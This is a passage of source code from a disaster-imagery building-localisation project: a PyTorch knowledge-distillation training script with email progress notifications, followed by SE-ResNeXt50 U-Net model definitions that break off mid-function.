"--mode", default="T-S", choices=["onlyT", "onlyS", "T-S", "TwoTeacher"]
)
parser.add_argument("--LWF", default=0, choices=[0, 1], type=int)
parser.add_argument("--LFL", default=0, choices=[0, 1], type=int)
parser.add_argument("--clsLFL", default=0, choices=[0, 1], type=int)
parser.add_argument("--KL", default=0, choices=[0, 1], type=int)
parser.add_argument("--dataset", default="../data")
parser.add_argument("--checkpoint_path", default="../weights")
parser.add_argument("--seed", default=1, type=int)
parser.add_argument("--vis_dev", default=0, type=int)
parser.add_argument("--batch_size", default=8, type=int)
parser.add_argument("--val_batch_size", default=4, type=int)
parser.add_argument("--lr", default=0.002, type=float)
parser.add_argument("--weight_decay", default=1e-6, type=float)
parser.add_argument("--theta", default=1.0, type=float)
parser.add_argument("--alpha", default=1.0, type=float)
parser.add_argument("--alpha_cls", default=1.0, type=float)
parser.add_argument("--beta", default=1.0, type=float)
parser.add_argument("--m", default=0.2, type=float)
args = parser.parse_args()
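# Example invocation (a sketch; the paths and flag values below are placeholders, not taken from the original repo).
# Note that the script concatenates --dataset directly with the split name, so a trailing "/" may be needed:
#   python train_student_building.py --mode T-S --LWF 1 --LFL 1 --KL 1 \
#       --dataset ../data/ --checkpoint_path ../weights --vis_dev 0 --batch_size 8 --lr 0.002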
logger.add_attr("LWF", args.LWF, "info")
logger.add_attr("LFL", args.LFL, "info")
logger.add_attr("clsLFL", args.clsLFL, "info")
logger.add_attr("KL", args.KL, "info")
logger.add_attr("mode", args.mode, "info")
logger.add_attr("lr", args.lr, "info")
logger.add_attr("theta", args.theta, "info")
logger.add_attr("alpha", args.alpha, "info")
logger.add_attr("alpha_cls", args.alpha_cls, "info")
logger.add_attr("beta", args.beta, "info")
logger.add_attr("m", args.m, "info")
logger.add_attr("weight_decay", args.weight_decay, "info")
logger.insert_into_db("info")
emailbot = EmailBot("../settings.json")
emailbot.sendOne(
{
"title": "显卡%s训练任务开始训练loc" % args.vis_dev,
"content": "mode=%s,LWF=%s,KL=%s,LFL=%s,clsLFL=%s"
% (args.mode, args.LWF, args.KL, args.LFL, args.clsLFL),
}
)
cv2.setNumThreads(0)
cv2.ocl.setUseOpenCL(False)
train_dirs = ["train", "tier3"]
models_folder = args.checkpoint_path
input_shape = (512, 512)
all_files = []
for d in train_dirs:
for f in sorted(listdir(path.join(args.dataset + d, "images"))):
if "_pre_disaster.png" in f:
all_files.append(path.join(args.dataset + d, "images", f))
class TrainData(Dataset):
def __init__(self, train_idxs):
super().__init__()
self.train_idxs = train_idxs
self.elastic = iaa.ElasticTransformation(alpha=(0.25, 1.2), sigma=0.2)
def __len__(self):
return len(self.train_idxs)
def __getitem__(self, idx):
_idx = self.train_idxs[idx]
fn = all_files[_idx]
img = cv2.imread(fn, cv2.IMREAD_COLOR)
if random.random() > 0.985:
img = cv2.imread(
fn.replace("_pre_disaster", "_post_disaster"), cv2.IMREAD_COLOR
)
msk0 = cv2.imread(fn.replace("/images/", "/masks/"), cv2.IMREAD_UNCHANGED)
if random.random() > 0.5:
img = img[::-1, ...]
msk0 = msk0[::-1, ...]
if random.random() > 0.05:
rot = random.randrange(4)
if rot > 0:
img = np.rot90(img, k=rot)
msk0 = np.rot90(msk0, k=rot)
if random.random() > 0.9:
shift_pnt = (random.randint(-320, 320), random.randint(-320, 320))
img = shift_image(img, shift_pnt)
msk0 = shift_image(msk0, shift_pnt)
if random.random() > 0.9:
rot_pnt = (
img.shape[0] // 2 + random.randint(-320, 320),
img.shape[1] // 2 + random.randint(-320, 320),
)
scale = 0.9 + random.random() * 0.2
angle = random.randint(0, 20) - 10
if (angle != 0) or (scale != 1):
img = rotate_image(img, angle, scale, rot_pnt)
msk0 = rotate_image(msk0, angle, scale, rot_pnt)
crop_size = input_shape[0]
if random.random() > 0.3:
crop_size = random.randint(
int(input_shape[0] / 1.1), int(input_shape[0] / 0.9)
)
bst_x0 = random.randint(0, img.shape[1] - crop_size)
bst_y0 = random.randint(0, img.shape[0] - crop_size)
bst_sc = -1
try_cnt = random.randint(1, 5)
for i in range(try_cnt):
x0 = random.randint(0, img.shape[1] - crop_size)
y0 = random.randint(0, img.shape[0] - crop_size)
_sc = msk0[y0 : y0 + crop_size, x0 : x0 + crop_size].sum()
if _sc > bst_sc:
bst_sc = _sc
bst_x0 = x0
bst_y0 = y0
x0 = bst_x0
y0 = bst_y0
img = img[y0 : y0 + crop_size, x0 : x0 + crop_size, :]
msk0 = msk0[y0 : y0 + crop_size, x0 : x0 + crop_size]
if crop_size != input_shape[0]:
img = cv2.resize(img, input_shape, interpolation=cv2.INTER_LINEAR)
msk0 = cv2.resize(msk0, input_shape, interpolation=cv2.INTER_LINEAR)
if random.random() > 0.99:
img = shift_channels(
img, random.randint(-5, 5), random.randint(-5, 5), random.randint(-5, 5)
)
if random.random() > 0.99:
img = change_hsv(
img, random.randint(-5, 5), random.randint(-5, 5), random.randint(-5, 5)
)
if random.random() > 0.99:
if random.random() > 0.99:
img = clahe(img)
elif random.random() > 0.99:
img = gauss_noise(img)
elif random.random() > 0.99:
img = cv2.blur(img, (3, 3))
elif random.random() > 0.99:
if random.random() > 0.99:
img = saturation(img, 0.9 + random.random() * 0.2)
elif random.random() > 0.99:
img = brightness(img, 0.9 + random.random() * 0.2)
elif random.random() > 0.99:
img = contrast(img, 0.9 + random.random() * 0.2)
if random.random() > 0.999:
el_det = self.elastic.to_deterministic()
img = el_det.augment_image(img)
msk = msk0[..., np.newaxis]
msk = (msk > 127) * 1
img = preprocess_inputs(img)
img = torch.from_numpy(img.transpose((2, 0, 1))).float()
msk = torch.from_numpy(msk.transpose((2, 0, 1))).long()
sample = {"img": img, "msk": msk, "fn": fn}
return sample
class ValData(Dataset):
def __init__(self, image_idxs):
super().__init__()
self.image_idxs = image_idxs
def __len__(self):
return len(self.image_idxs)
def __getitem__(self, idx):
_idx = self.image_idxs[idx]
fn = all_files[_idx]
img = cv2.imread(fn, cv2.IMREAD_COLOR)
msk0 = cv2.imread(fn.replace("/images/", "/masks/"), cv2.IMREAD_UNCHANGED)
msk = msk0[..., np.newaxis]
msk = (msk > 127) * 1
img = preprocess_inputs(img)
img = torch.from_numpy(img.transpose((2, 0, 1))).float()
msk = torch.from_numpy(msk.transpose((2, 0, 1))).long()
sample = {"img": img, "msk": msk, "fn": fn}
return sample
def validate(model, data_loader):
global logger
dices0 = []
_thr = 0.5
with torch.no_grad():
for i, sample in enumerate(tqdm(data_loader)):
msks = sample["msk"].numpy()
imgs = sample["img"].cuda(non_blocking=True)
t1 = time.time()
out = model(imgs)
t2 = time.time()
logger.add_attr("batch_%s" % i, t2 - t1, "time_difference")
msk_pred = torch.sigmoid(out[:, 0, ...]).cpu().numpy()
for j in range(msks.shape[0]):
dices0.append(dice(msks[j, 0], msk_pred[j] > _thr))
logger.insert_into_db("time_difference")
d0 = np.mean(dices0)
logger.add_attr("d0", d0)
print("Val Dice: {}".format(d0))
return d0
def evaluate_val_kd(args, data_val, best_score, model, snapshot_name, current_epoch):
global logger
model.eval()
d = validate(model, data_loader=data_val)
logger.add_attr("epoch", epoch)
if d > best_score:
torch.save(
{
"epoch": current_epoch + 1,
"state_dict": model.state_dict(),
"best_score": d,
},
path.join(models_folder, snapshot_name + "_best"),
)
best_score = d
emailbot = EmailBot("../settings.json")
emailbot.sendOne(
{
"title": "显卡%s训练任务进行epoch=%s的测试" % (args.vis_dev, current_epoch),
"content": "测试分数%s" % d,
}
)
print("score: {}\tscore_best: {}".format(d, best_score))
return best_score
def train_epoch_kd(
args,
current_epoch,
seg_loss,
models,
optimizer,
scheduler,
train_data_loader,
):
model_s, model_t, model_t_cls = models
theta = args.theta
alpha = args.alpha
beta = args.beta
global logger
losses = AverageMeter()
dices = AverageMeter()
iterator = tqdm(train_data_loader)
if args.mode == "onlyT":
model_t.train(mode=True)
elif args.mode == "onlyS":
model_s.train(mode=True)
else:
model_s.train(mode=True)
model_t.eval()
if args.mode == "TwoTeacher":
model_t_cls.eval()
for i, sample in enumerate(iterator):
imgs = sample["img"].cuda(non_blocking=True)
msks = sample["msk"].cuda(non_blocking=True)
if args.mode != "onlyS":
out_t = model_t(imgs)[:, 0, ...]
soft_out_t = torch.sigmoid(out_t / 2)
feature_t = model_t.conv1(imgs)
feature_t = model_t.conv2(feature_t)
feature_t = model_t.conv3(feature_t)
feature_t = model_t.conv4(feature_t)
feature_t = model_t.conv5(feature_t)
if args.mode != "onlyT":
out_s = model_s(imgs)[:, 0, ...]
soft_out_s = torch.sigmoid(out_s / 2)
feature_s = model_s.conv1(imgs)
feature_s = model_s.conv2(feature_s)
feature_s = model_s.conv3(feature_s)
feature_s = model_s.conv4(feature_s)
feature_s = model_s.conv5(feature_s)
if args.mode == "TwoTeacher":
# out_t_cls = model_t_cls(imgs)
# soft_out_t_cls = channel_five2two(F.softmax(out_t_cls, dim=1))[:, 1, ...]
feature_tmp = model_t_cls.conv1(imgs)
feature_tmp = model_t_cls.conv2(feature_tmp)
feature_tmp = model_t_cls.conv3(feature_tmp)
feature_tmp = model_t_cls.conv4(feature_tmp)
feature_tmp = model_t_cls.conv5(feature_tmp)
feature_t_cls = model_t_cls.conv1(imgs)
feature_t_cls = model_t_cls.conv2(feature_t_cls)
feature_t_cls = model_t_cls.conv3(feature_t_cls)
feature_t_cls = model_t_cls.conv4(feature_t_cls)
feature_t_cls = model_t_cls.conv5(feature_t_cls)
feature_t_cls = torch.cat([feature_tmp, feature_t_cls], 1)
# parser.add_argument('--loss',default='onlyCls',choices = ['onlyCls','Cls+LWF','Cls+LFL','Cls+LWF+LFL','TwoTeacher'])
if args.mode in ["T-S", "TwoTeacher"]:
loss_seg = seg_loss(soft_out_s, msks)
loss_cls = -torch.log(
1e-9 + soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
).mean()
loss = theta * loss_cls + loss_seg
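            # Optional knowledge-distillation terms (each disabled unless its flag is set):
            #   LWF - weights the student's log-likelihood by the teacher's confidence on the true mask,
            #   LFL - penalises the L2 distance between teacher and student encoder features,
            #   KL  - adds a KL-style divergence between the softened student and teacher outputs.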
if args.LWF:
loss_ko = -(
(soft_out_t * msks + (1 - soft_out_t) * (1 - msks))
* torch.log(
1e-9 + soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
)
).mean()
loss += loss_ko * beta
if args.LFL:
loss_kf = torch.norm(feature_t - feature_s, p=2, dim=0).mean()
loss += loss_kf * alpha
if args.KL:
soft_out_s = torch.sigmoid(out_s)
softmax_s = torch.cat(
((1 - soft_out_s).unsqueeze(1), soft_out_s.unsqueeze(1)), dim=1
)
soft_out_t = torch.sigmoid(out_t)
softmax_t = torch.cat(
((1 - soft_out_t).unsqueeze(1), soft_out_t.unsqueeze(1)), dim=1
)
loss_kl = (
(torch.log(1e-9 + softmax_s) - torch.log(1e-9 + softmax_t))
* softmax_s
).mean()
loss += loss_kl
if args.mode == "TwoTeacher":
loss_t_cls = theta * loss_cls
# if args.LWF:
# loss_ko_cls = (
# -(
# (soft_out_t * msks + (1 - soft_out_t) * (1 - msks))
# * torch.log(
# soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
# )
# ).mean()
# / 2.0
# )
# loss_t_cls += beta * loss_ko_cls
if args.clsLFL:
loss_kf_cls = torch.norm(
feature_s - feature_t_cls[:, :2048, ...], p=2, dim=0
).mean()
loss_t_cls += args.alpha_cls * loss_kf_cls
# if args.KL:
# loss_kl_cls = (
# (torch.log(softmax_s) - F.log_softmax(out_t_cls, dim=1))
# * softmax_s
# ).mean()
# loss_t_cls += loss_kl_cls
loss = (1 - args.m) * loss + args.m * loss_t_cls
with torch.no_grad():
dice_sc = 1 - dice_round(soft_out_s, msks[:, 0, ...])
elif args.mode == "onlyT":
loss_seg = seg_loss(soft_out_t, msks)
loss_cls = -torch.log(
1e-9 + soft_out_t * msks + (1 - soft_out_t) * (1 - msks)
).mean()
loss = theta * loss_cls + loss_seg
with torch.no_grad():
dice_sc = 1 - dice_round(soft_out_t, msks[:, 0, ...])
else:
loss_seg = seg_loss(soft_out_s, msks)
loss_cls = -torch.log(
1e-9 + soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
).mean()
loss = theta * loss_cls + loss_seg
with torch.no_grad():
dice_sc = 1 - dice_round(soft_out_s, msks[:, 0, ...])
losses.update(loss.item(), imgs.size(0))
dices.update(dice_sc, imgs.size(0))
if not args.LWF:
loss_ko = torch.tensor(0)
if not args.LFL:
loss_kf = torch.tensor(0)
if not args.KL:
loss_kl = torch.tensor(0)
if args.mode == "T-S":
iterator.set_description(
"epoch: {}; lr {:.7f}; Loss {loss.val:.4f} ({loss.avg:.4f}),Loss_cls {loss_cls:.4f},Loss_kf {loss_kf:.4f},Loss_ko {loss_ko:.4f},Loss_kl {loss_kl:.4f},Loss_seg {loss_seg:.4f}; Dice {dice.val:.4f} ({dice.avg:.4f})".format(
current_epoch,
scheduler.get_lr()[-1],
loss=losses,
loss_cls=theta * loss_cls.item(),
loss_kf=alpha * loss_kf.item(),
loss_ko=beta * loss_ko.item(),
loss_kl=loss_kl.item(),
loss_seg=loss_seg.item(),
dice=dices,
)
)
elif args.mode == "TwoTeacher":
loss_ko_cls = torch.tensor(0)
if not args.clsLFL:
loss_kf_cls = torch.tensor(0)
loss_kl_cls = torch.tensor(0)
iterator.set_description(
"epoch: {}; lr {:.7f}; Loss {loss.val:.4f} ({loss.avg:.4f}),Loss_cls {loss_cls:.4f},Loss_kf {loss_kf:.4f},Loss_ko {loss_ko:.4f},Loss_kl {loss_kl:.4f},Loss_kf_cls {loss_kf_cls:.4f},Loss_ko_cls {loss_ko_cls:.4f},Loss_kl_cls {loss_kl_cls:.4f},Loss_seg {loss_seg:.4f}; Dice {dice.val:.4f} ({dice.avg:.4f})".format(
current_epoch,
scheduler.get_lr()[-1],
loss=losses,
loss_cls=theta * loss_cls.item(),
loss_kf=alpha * loss_kf.item(),
loss_ko=beta * loss_ko.item(),
loss_kl=loss_kl.item(),
loss_kf_cls=alpha * loss_kf_cls.item(),
loss_ko_cls=beta * loss_ko_cls.item(),
loss_kl_cls=loss_kl_cls.item(),
loss_seg=loss_seg.item(),
dice=dices,
)
)
else:
iterator.set_description(
"epoch: {}; lr {:.7f}; Loss {loss.val:.4f}; Dice {dice.val:.4f} ({dice.avg:.4f})".format(
current_epoch, scheduler.get_lr()[-1], loss=losses, dice=dices
)
)
optimizer.zero_grad()
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
# loss.backward()
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), 1.1)
optimizer.step()
scheduler.step(current_epoch)
print(
"epoch: {}; lr {:.7f}; Loss {loss.avg:.4f}".format(
current_epoch, scheduler.get_lr()[-1], loss=losses
)
)
if __name__ == "__main__":
t0 = timeit.default_timer()
makedirs(models_folder, exist_ok=True)
seed = args.seed
vis_dev = args.vis_dev
os.environ["CUDA_VISIBLE_DEVICES"] = str(vis_dev)
cudnn.benchmark = True
batch_size = args.batch_size
val_batch_size = args.val_batch_size
snapshot_name = "loc_KD_{}_best".format(logger.log_id)
train_idxs, val_idxs = train_test_split(
np.arange(len(all_files)), test_size=0.1, random_state=seed
)
np.random.seed(seed + 123)
random.seed(seed + 123)
steps_per_epoch = len(train_idxs) // batch_size
validation_steps = len(val_idxs) // val_batch_size
print("steps_per_epoch", steps_per_epoch, "validation_steps", validation_steps)
data_train = TrainData(train_idxs)
val_train = ValData(val_idxs)
train_data_loader = DataLoader(
data_train,
batch_size=batch_size,
num_workers=5,
shuffle=True,
pin_memory=False,
drop_last=True,
)
val_data_loader = DataLoader(
val_train,
batch_size=val_batch_size,
num_workers=5,
shuffle=False,
pin_memory=False,
)
if args.mode == "onlyT":
model_t = SeResNext50_Unet_Loc().cuda()
elif args.mode == "onlyS":
model_s = SeResNext50_Unet_Loc_KD().cuda()
else:
model_s = SeResNext50_Unet_Loc_KD().cuda()
model_t = SeResNext50_Unet_Loc().cuda()
if args.mode == "TwoTeacher":
model_t_cls = SeResNext50_Unet_Double().cuda()
checkpoint = torch.load(
"weights/res50_cls_cce_1_tuned_best", map_location="cpu"
)
loaded_dict = checkpoint["state_dict"]
sd = model_t_cls.state_dict()
for k in model_t_cls.state_dict():
if k in loaded_dict and sd[k].size() == loaded_dict[k].size():
sd[k] = loaded_dict[k]
loaded_dict = sd
model_t_cls.load_state_dict(loaded_dict)
        # named_parameters() yields (name, parameter) pairs; specific modules can be
        # frozen by checking the parameter name.
        for key, value in model_t_cls.named_parameters():
            value.requires_grad = False
if args.mode != "onlyT":
params = model_s.parameters()
optimizer = AdamW(params, lr=args.lr, weight_decay=args.weight_decay)
model_s, optimizer = amp.initialize(model_s, optimizer, opt_level="O0")
scheduler = lr_scheduler.MultiStepLR(
optimizer,
milestones=[4, 6, 8, 10, 12, 14, 15, 16, 17, 18, 19, 20],
gamma=0.5,
)
else:
params = model_t.parameters()
optimizer = AdamW(params, lr=args.lr, weight_decay=args.weight_decay)
model_t, optimizer = amp.initialize(model_t, optimizer, opt_level="O0")
scheduler = lr_scheduler.MultiStepLR(
optimizer,
milestones=[4, 6, 8, 10, 12, 14, 15, 16, 17, 18, 19, 20],
gamma=0.5,
)
seg_loss = ComboLoss({"dice": 3.0, "focal": 10.0}, per_image=False).cuda()
if args.mode in ["T-S", "TwoTeacher"]:
snap_to_load = "weights/res50_loc_0_tuned_best"
checkpoint = torch.load(snap_to_load, map_location="cpu")
loaded_dict = checkpoint["state_dict"]
sd = model_t.state_dict()
for k in model_t.state_dict():
if k in loaded_dict and sd[k].size() == loaded_dict[k].size():
sd[k] = loaded_dict[k]
loaded_dict = sd
model_t.load_state_dict(loaded_dict)
print(
"loaded checkpoint '{}' (epoch {}, best_score {})".format(
snap_to_load, checkpoint["epoch"], checkpoint["best_score"]
)
)
        # named_parameters() yields (name, parameter) pairs; specific modules can be frozen by checking the parameter name.
for key, value in model_t.named_parameters():
value.requires_grad = False
del loaded_dict
del sd
del checkpoint
best_score = 0
_cnt = -1
torch.cuda.empty_cache()
if args.mode == "onlyT":
model_train = model_t
models = (None, model_t, None)
else:
model_train = model_s
if args.mode == "onlyS":
models = (model_s, None, None)
elif args.mode == "T-S":
models = (model_s, model_t, None)
else:
models = (model_s, model_t, model_t_cls)
for epoch in range(30):
train_epoch_kd(
args,
epoch,
seg_loss,
models,
optimizer,
scheduler,
train_data_loader,
)
if epoch % 2 == 0:
_cnt += 1
torch.cuda.empty_cache()
best_score = evaluate_val_kd(
args, val_data_loader, best_score, model_train, snapshot_name, epoch
)
elapsed = timeit.default_timer() - t0
print("Time: {:.3f} min".format(elapsed / 60))
emailbot = EmailBot("../settings.json")
emailbot.sendOne(
{"title": "显卡%s训练任务完成" % args.vis_dev, "content": "最佳分数%s" % best_score}
)
```
#### File: train_src/zoo/models_vis.py
```python
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import torchvision.models
from models import ConvRelu
from .senet import se_resnext50_32x4d, senet154
class SeResNext50_Unet_Loc(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Loc, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 2
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5], 1, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Loc_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Loc_KD, self).__init__()
encoder_filters = np.array([64, 256, 512, 1024, 2048])
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5], 1, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Loc_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Loc_KD, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5], 1, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Double(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Double, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 2
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5] * 2, 5, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward1(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
